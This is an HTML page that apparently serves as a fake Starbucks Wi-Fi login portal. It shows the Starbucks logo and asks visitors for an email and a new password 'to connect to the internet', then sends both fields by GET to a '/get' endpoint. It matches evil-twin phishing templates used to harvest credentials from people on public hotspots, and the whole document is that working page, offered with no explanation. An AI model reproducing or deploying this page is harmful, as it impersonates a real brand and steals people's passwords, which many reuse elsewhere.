<!DOCTYPE html>
<html>
  <head>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        background-color: #003307;
      }
      .container {
        width: 80%;
        max-width: 300px;
        margin: 10% auto;
        text-align: center;
      }
      .container .logo {
        width: 50%;
        height: auto;
        margin-bottom: 15px;
      }
      .container h1 {
        margin: 5px 0;
        color: #ffffff;
      }
      .container p {
        margin: 0;
        font-size: 0.8em;
        color: #ffffff;
      }
      .container form {
        display: flex;
        flex-direction: column;
      }
      .container form input {
        margin: 5px 0;
        padding: 10px;
        border: 1px solid #ffffff;
        border-radius: 3px;
      }
      .container form button {
        margin: 5px 0;
        padding: 10px;
        color: #ffffff;
        background-color: #036800;
        border: none;
        border-radius: 3px;
        cursor: pointer;
      }
      .container form button:hover {
        background-color: #005999;
      }
      @media (max-width: 600px) {
        .container {
          width: 95%;
        }
      }
    </style>
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1"
    /> 
  </head>
  <body>
    <div class="container">
      <!-- Starbucks logo image -->
      <img class="logo" src="https://cdn.worldvectorlogo.com/logos/starbucks.svg" alt="Starbucks Logo" />
      <!-- End of Starbucks logo image -->
      <h1>Welcome</h1>
      <p>Please enter your email and create a password to connect to the internet</p>
      <form action="/get" method="GET">
        <input type="text" name="email" placeholder="Email" required />
        <input
          type="password"
          name="password"
          placeholder="Password"
          required
        />
        <button type="submit">Login</button>
      </form>
    </div>
  </body>
</html>